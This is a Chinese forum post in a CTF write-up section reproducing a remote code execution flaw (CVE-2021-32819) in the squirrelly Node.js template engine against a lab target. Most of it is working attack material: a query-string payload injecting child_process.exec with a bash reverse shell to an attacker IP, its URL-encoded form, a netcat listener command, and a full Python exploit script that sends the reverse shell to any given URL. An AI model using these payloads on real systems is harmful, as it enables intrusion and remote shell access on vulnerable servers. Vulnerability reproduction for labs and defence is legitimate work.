论坛首页 > CTF&WP专版

Nodejs及其相关漏洞

Track-mss · 发表于 2021-08-10 10:34:58 · CTF&WP专版

1、Nodejs squirrelly模版引擎RCE（CVE-2021-32819）

1、Nodejs squirrelly模版引擎RCE（CVE-2021-32819）

0x01 简介

squirrelly是 JavaScript的半嵌入式模板引擎，设计为仅传递模板数据。

0x02 漏洞概述

该漏洞是由于squirrelly模板组件的内部配置变量错误的被外部参数覆盖造成的。

0x03 影响版本

从v8.0.0到v8.0.8

0x04 复现

靶场地址：http://squirrelly_rce-ft432si.lab.aqlab.cn/

flag地址：/tmp/flag

flag:flag{d59362b6-3e73-4d49-b5cf-e4ed21665f03}

1、浏览器操作-反弹shell

1、构造如下payload

?defaultFilter=e'));let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('/bin/bash -c "/bin/bash -i >& /dev/tcp/vpn/端口 0>&1"');//

如

e'));let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.174.131/666 0>&1"');//

然后进行url编码

e%27%29%29%3Blet%20require%20%3D%20global.require%20%7C%7C%20global.process.mainModule.constructor._load%3B%20require%28%27child_process%27%29.exec%28%27/bin/bash%20-c%20%22/bin/bash%20-i%20%3E%26%20/dev/tcp/192.168.174.131/666%200%3E%261%22%27%29%3B//

和?defaultFilter=拼接

defaultFilter=e%27%29%29%3Blet%20require%20%3D%20global.require%20%7C%7C%20global.process.mainModule.constructor._load%3B%20require%28%27child_process%27%29.exec%28%27/bin/bash%20-c%20%22/bin/bash%20-i%20%3E%26%20/dev/tcp/192.168.174.131/666%200%3E%261%22%27%29%3B//

攻击机开启监听nc -lnvp 666,浏览器访问如下url即可

http://192.168.174.131:3000/?defaultFilter=e%27%29%29%3Blet%20require%20%3D%20global.require%20%7C%7C%20global.process.mainModule.constructor._load%3B%20require%28%27child_process%27%29.exec%28%27/bin/bash%20-c%20%22/bin/bash%20-i%20%3E%26%20/dev/tcp/192.168.174.131/666%200%3E%261%22%27%29%3B//

2、 exp.py

项目地址：https://github.com/Abady0x1/CVE-2021-32819，用法和代码如下

#!/bin/python3
#nc -lvp 443
#python3 exploit.py http://example.com/  ATTACKER_HOST 443
import requests
from sys import argv
if __name__ == '__main__':
    url = argv[1]
    lhost = argv[2]
    lport = argv[3]
    command = f'/bin/bash -c "/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"'
    code = "e'));"
    code += f"let require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('{command}');"
    code += '//'
    payload = {
        'defaultFilter': code
    }
    print(payload)
    try:
        requests.get(url, params = payload, verify = False, timeout = 1)
        print(payload)
    except requests.exceptions.ReadTimeout:
        print('[+] Payload sent. check your listener please')

打赏我,让我更有动力~

0 条回复 | 直到 2021-8-10 | 1382 次浏览

登录后才可发表内容